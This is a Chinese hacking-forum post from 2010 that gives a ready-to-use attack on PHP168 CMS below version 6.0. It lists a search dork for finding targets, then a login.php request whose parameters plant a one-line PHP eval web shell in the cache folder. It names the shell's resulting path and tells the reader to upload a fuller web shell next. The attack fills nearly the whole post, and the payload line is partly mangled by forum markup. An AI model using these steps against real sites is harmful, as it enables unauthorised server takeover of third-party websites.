Board logo

标题: PHP168漏洞 Nday [打印本页]

作者: 柔肠寸断    时间: 2010-1-9 15:47     标题: PHP168漏洞 Nday

PHP168漏洞  Nday

1,适用于PHP168 6.0以下版本


2,搜索关键字:Powered by php168 inurl:login.php


3,随便找一个试试:例如:www.xxxxxxxxx.com/login.php


4:在www.xxxxxxxxx.com/login.php后面加上 ?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<[email=?php%20@eval($_POST[a]);?]?php%20@eval($_POST[a]);?[/email] >
即组成:[url=http://www.xxxxxxxxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=al($_POST[a[/email] >[/url]]);?


5,没有返回错误 那就继续
www.xxxxxxxxx.com/cache/shell.php  就是一句话的地址 【<?php%20@eval($_POST[a]);?> 】


6,用lanker微型PHP+ASP管理器1.0双用版 上传大马
作者: 林东东321    时间: 2010-3-14 15:50

提示: 作者被禁止或删除 内容自动屏蔽




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2